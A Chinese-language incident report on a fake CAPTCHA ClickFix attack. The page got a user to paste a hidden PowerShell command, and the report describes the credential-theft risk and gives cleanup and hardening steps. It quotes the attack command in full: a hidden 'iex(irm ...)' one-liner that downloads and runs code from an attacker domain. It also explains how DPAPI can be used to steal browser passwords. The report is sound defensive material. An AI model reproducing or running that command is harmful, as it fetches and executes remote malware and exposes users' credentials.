网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本 网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本报告编号SEC-20260630-001报告日期2026年6月30日报告人工业废气受影响设备个人计算机Windows系统事件等级中危恶意代码执行凭证泄露风险高一、事件概述2026年6月30日用户访问一个长期无法正常连接的BT下载网站时被重定向至恶意域名claspopclicktodayinstantly.monster。该页面伪装成CAPTCHA人机验证诱导用户通过“WinX”运行一段经过伪装的恶意PowerShell命令。用户执行命令后安全软件360安全卫士成功拦截了后续释放的木马程序但命令在内存中执行时可能已完成对浏览器保存密码等敏感信息的窃取。二、攻击时间线时间节点事件描述今天早些时候访问已失效的BT站被跳转至恶意钓鱼页面跳转后页面显示“人机验证”要求按WinX再按I键粘贴命令执行命令运行恶意PowerShell命令系统以隐藏窗口执行命令执行后从远程下载恶意脚本在内存中执行释放木马至Temp目录随后360拦截进程创建conhost.exe删除木马文件当前状态用户再次访问该BT站已无法连接恶意跳转已消失三、攻击手段技术分析3.1 初始入侵点跳转机制原BT站域名已长期无法访问本次跳转并非原站被篡改极可能是由DNS污染/劫持、本机hosts文件被篡改或路由器DNS被恶意修改所致。跳转目标claspopclicktodayinstantly.monster具有典型的一次性诈骗域名特征随机词堆叠、廉价顶级域。3.2 社会工程学诱导页面模仿正规的CAPTCHA人机验证流程要求用户执行组合键WinX再按下I键打开PowerShell并粘贴一段看似含有“验证ID”的代码。代码中的注释#Verification ID: 35300a89e82c4da3#增强了欺骗性降低用户警惕性。3.3 攻击来源识别执行的命令为powershell-w hiex(irm idverification-cdn.info/35300a89e82c4da3 -UseBasicParsing);exit#Verification ID: 35300a89e82c4da3#各部分功能组件含义-w h-WindowStyle Hidden隐藏PowerShell窗口iexInvoke-Expression将从网络获取的字符串作为代码执行irmInvoke-RestMethod从指定URL下载内容idverification-cdn.info/...攻击者控制的载荷存放地址含追踪ID; exit执行后立即退出减少暴露窗口#...#PowerShell块注释伪装成“验证ID”该技术属于典型的无文件攻击Fileless Malware恶意代码全程在内存中运行不直接写入磁盘绕过传统基于文件的杀毒检测。直到最后释放的.exe文件被360拦截。3.4 密码窃取原理攻击者一旦在用户账户下运行便可利用Windows数据保护接口DPAPI解密存储在Microsoft Edge浏览器中的密码。因为用户已登录系统DPAPI会自动提供解密密钥。因此内存中的脚本可以轻松读取并上传浏览器中所有保存的网站明文密码、Cookie等信息。四、已发生的恶意行为与拦截情况恶意进程释放木马文件fhdnhrxs.ioz.exe被释放到C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\。进程创建企图木马试图创建子进程C:\Windows\System32\conhost.exe以承载后续后门或记录行为。安全软件响应360安全卫士实时防护模块识别为Trojan.Generic成功拦截进程创建并删除木马文件。进程C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\fhdnhrxs.ioz.exe 动作进程创建 路径C:\Windows\System32\conhost.exe 拦截补充描述有木马试图攻击您的电脑360已成功拦截。 防护信息: AD|1, 4|10, 70, 10||木马名称Trojan.Generic 所在路径C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\fhdnhrxs.ioz.exe五、潜在风险与影响评估尽管木马落地组件被清除但由于PowerShell命令已在内存中执行以下风险仍可能已经发生浏览器凭证泄露Edge中保存的所有密码、Cookie极可能已被明文上传至攻击者服务器。令牌与会话窃取部分网站的自动登录令牌可能被盗导致攻击者能绕过密码直接登录。系统残留恶意命令可能修改了系统hosts文件、设置了代理或创建了计划任务以维持长期访问。二次跳板该BT站域名被篡改的解析记录可能仍存在于本地DNS缓存或网络设备中存在再次被跳转的风险。六、已采取及建议的处置措施6.1 立即执行已完成或正在进行360安全卫士实时防护拦截并清除了木马文件。确认恶意进程未继续运行。在手机或其他未受影响的设备上立即修改所有在Edge中保存过的网站密码重点邮箱、网银、社交账号。为所有重要账户开启双因素认证2FA。6.2 系统排查与清理务必执行检查hosts文件用记事本打开C:\Windows\System32\drivers\etc\hosts删除任何指向该BT站域名的条目。检查系统代理设置进入“设置 → 网络和 Internet → 代理”确保“使用代理服务器”为关闭状态且无异常自动配置脚本。检查浏览器扩展与快捷方式打开edge://extensions移除非必要的可疑扩展。检查Edge快捷方式属性确保目标路径后无恶意加载参数。检查任务计划程序打开“任务计划程序”查找近期创建的名称随机或内容可疑的任务确认后删除。检查路由器DNS登录路由器管理后台确认DHCP分配DNS未被篡改推荐改用1.1.1.1或8.8.8.8。启用DNS安全在Edge中启用“使用安全的DNS”选择Cloudflare或Google规避DNS污染。全盘扫描使用360安全卫士执行“全盘扫描”并用Malwarebytes等第二意见扫描器进行交叉查杀。清理浏览器数据在edge://settings/siteData中搜索并删除该BT站域名及恶意跳转域名的所有存储数据。6.3 长期加固建议提高安全意识任何要求通过“WinX”粘贴代码的验证方法均为欺诈应立即关闭页面。定期修改重要密码不重复使用相同密码。使用密码管理器如Bitwarden替代浏览器原生密码存储可提供更强的防护。七、结论本次事件是一起结合了DNS劫持/污染、社会工程学和无文件攻击的复合型网络攻击。攻击者利用用户对失效网站的访问惯性和对CAPTCHA“安全性”的默认信任将流量诱导至精心设计的钓鱼页面进而窃取敏感凭证。得益于安全软件的行为拦截木马未能在本地建立持久化后门但信息泄露风险仍然较高。当前最紧迫的行动是彻底修改受影响密码并完成上述系统排查项目以根除残留隐患和防止二次跳转。